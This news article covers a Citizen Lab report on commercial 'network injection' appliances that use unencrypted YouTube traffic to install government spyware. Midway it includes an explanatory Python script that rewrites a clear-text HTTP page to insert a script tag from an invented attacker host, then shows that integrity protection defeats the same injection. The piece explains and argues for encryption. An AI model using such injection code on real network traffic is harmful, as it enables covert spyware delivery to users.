A new report from the digital human rights watchdogs at The Citizen Lab at the University of Toronto's Munk School of Global Affairs reveals that "network injection appliances" sold by commercial surveillance vendors are actively exploiting common consumer services, like YouTube, to install malicious software around the world. All of which means, in short, that your love of cat videos might be putting you at risk of being hacked.
In the report, security researcher Morgan Marquis-Boire describes how a network injection attack works. The attacker first needs a position on the path between the target and the sites the target visits, whether at the Internet Service Provider or on the local network the target's computer is connected to. From there, the attacker reads the unencrypted traffic passing by (known as clear-text) and splices in a piece of malicious code, or payload, which the target's computer accepts as though it had come from the site it asked for.
These sorts of attacks have their selling points and their weaknesses. Their advantage over other types of attacks, like so-called spear-phishing or watering-hole attacks, is that those require the target to do something wrong, such as opening an infected file. Network injection attacks don't require that slip-up. Simply streaming an unencrypted video of a cat sitting in a coffee mug, or any other typical browsing, is enough. The limit, though, is that the code delivered via network injection initially runs only inside the user's browser, confined by the browser's own protections.
But, Marquis-Boire explains, the modern Internet provides plenty of ways out. Everything from advertising networks to browser plugins like Flash, Java and QuickTime offers a "low cost" avenue for an attacker to get from a user's browser to the rest of the machine, for example by presenting the user with a fake plugin update that is actually the surveillance agent. "While this infection method requires user interaction to accept the fake Flash update, it is also possible to bundle the payload with an exploit in order to silently install the surveillance agent," Marquis-Boire writes, so a user might not have any idea that something malicious is happening.
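To make the mechanism in the preceding paragraphs concrete, here is an added Python model, written for this page and not code from Hacking Team, Citizen Lab or the report, of what an on-path injector can do to a clear-text HTTP response and why the same position is useless against an integrity-protected channel. The video page, the session key and the host name in the injected tag are all constructed for the demonstration; the HMAC stands in for the per-record integrity protection a real TLS session provides (encryption is left out so the tampering stays readable).

```python
import hashlib
import hmac


def build_response(body: bytes,
                   content_type: bytes = b"text/html; charset=utf-8",
                   status: bytes = b"HTTP/1.1 200 OK") -> bytes:
    """Assemble a minimal HTTP/1.1 response whose Content-Length matches the body."""
    return (status + b"\r\n"
            + b"Content-Type: " + content_type + b"\r\n"
            + b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            + b"\r\n" + body)


# Constructed sample: the clear-text video page a browser would have fetched
# over plain HTTP. Not captured traffic.
ORIGINAL_PAGE = b'<html><body><video src="cat.mp4"></video></body></html>'
CLEAR_TEXT_RESPONSE = build_response(ORIGINAL_PAGE)

# Hypothetical reference the injector splices in; the host name is invented and
# stands for wherever the attacker hosts a fake update prompt or an exploit.
INJECTED_TAG = b'<script src="http://updates.example.invalid/flash_update.js"></script>'


def parse_response(raw: bytes):
    """Split a raw response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inject_into_clear_text(raw: bytes, tag: bytes = INJECTED_TAG) -> bytes:
    """
    What an on-path injector can do to unencrypted HTTP: rewrite the HTML so
    the browser also loads attacker-controlled content, then recompute
    Content-Length so the client sees a well-formed response. Non-HTML
    responses (the video bytes themselves, images) are passed through.
    """
    status, headers, body = parse_response(raw)
    ctype = headers.get(b"content-type", b"")
    if not ctype.startswith(b"text/html"):
        return raw
    if b"</body>" in body:
        body = body.replace(b"</body>", tag + b"</body>", 1)
    else:
        body += tag
    return build_response(body, ctype, status)


# Stand-in for the per-record integrity check an encrypted channel gives the
# client: an HMAC under a key the on-path party does not hold.
SESSION_KEY = b"constructed-demo-session-key"   # constructed, not a real key
MAC_LEN = hashlib.sha256().digest_size           # 32 bytes


def seal(record: bytes, key: bytes = SESSION_KEY) -> bytes:
    """Prefix the record with its MAC, as an integrity-protected channel would."""
    return hmac.new(key, record, hashlib.sha256).digest() + record


def open_record(sealed: bytes, key: bytes = SESSION_KEY):
    """Return the record if the MAC verifies; None means the client must abort."""
    mac, record = sealed[:MAC_LEN], sealed[MAC_LEN:]
    expected = hmac.new(key, record, hashlib.sha256).digest()
    return record if hmac.compare_digest(mac, expected) else None


def inject_into_sealed(sealed: bytes, tag: bytes = INJECTED_TAG) -> bytes:
    """The same injector applied on the wire to a sealed record: the bytes can
    be altered, but the MAC cannot be recomputed without the key."""
    mac, record = sealed[:MAC_LEN], sealed[MAC_LEN:]
    return mac + inject_into_clear_text(record, tag)


if __name__ == "__main__":
    print(inject_into_clear_text(CLEAR_TEXT_RESPONSE).decode())
    still_valid = open_record(inject_into_sealed(seal(CLEAR_TEXT_RESPONSE)))
    print("sealed record still verifies after injection:", still_valid is not None)
```

Run stand-alone, the script prints the rewritten clear-text page with the injected tag and a corrected Content-Length, then reports that the same rewrite against a sealed record fails verification. That is the whole argument for moving a service to HTTPS: the attacker's vantage point does not change, but the client stops accepting what it receives from it.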
The private sector network injection attacks described in the report resemble the NSA's QUANTUMINSERT system, revealed in documents leaked by former National Security Agency contractor Edward Snowden, which likewise inserts its own responses into a target's unencrypted traffic.
Software able to perform man-in-the-middle style attacks on networks has been available for years, including the open source "Ettercap" tool, written in 2001 by Alberto Ornaghi and Marco Valleri, which allows for the interception and manipulation of traffic on local area networks. Ornaghi and Valleri went on to become senior developers at the Milan-based surveillance company Hacking Team. And it is Hacking Team's commercial "Network Injector" tool that Citizen Lab says leverages YouTube to install a surveillance agent on a target's machine using a targeted payload, provided the operator has access to the network at the Internet Service Provider or Internet Exchange level.
And it means that just about any foreign government can now afford its own mini-NSA. One invoice reproduced in the Citizen Lab report billed the government of Turkmenistan the equivalent of just under $1 million, roughly 1 percent of 1 percent of the National Security Agency's annual budget, for a system that could locate and implant spyware on nearly any computer inside its borders. These turn-key systems, sold under the banner of "lawful intercept" tools, sometimes end up in the hands of countries with questionable human rights records, according to Citizen Lab. In their rare comments to the general public, vendors of such tools say they do not sell to customers on U.S., European or United Nations blacklists.
Why cat videos? Marquis-Boire says the injection attack would work on any unencrypted Web site. But commercial surveillance companies likely chose Google and Microsoft to target simply because they're the most popular and thus most likely to pay off. "I'll target YouTube rather than Bob's Burgers," he says, explaining the hacker mindset, "because the target is not visiting Bob's Burgers three times a day, but everybody in the world is visiting YouTube three times a day."
As more and more details about the NSA's ability to compromise unencrypted traffic have been revealed over the past year, tech companies have rushed to encrypt more and more of their consumer services, as well as the links between their own data centers. Marquis-Boire reports that some of the consumer services targeted in these sorts of network injection attacks have been scrambling to encrypt, and thus protect, their traffic since being contacted by the researcher about those weaknesses. Google, for example, has now encrypted a "large majority" of its links to YouTube videos, Marquis-Boire writes, and the company is said to be accelerating its plans to encrypt the ways that it connects with users.
It's unclear just how widely these commercial hacking tools are used by other governments, or with what level of oversight. While some privacy experts have in the past assumed the capability to launch an effective network injection attack would be limited to the most advanced government actors, the proliferation of similar technology on the commercial market raises new questions about how widespread such practices may become as they become cheaper to replicate, and about what responsibility even smaller content providers may have to up their encryption game.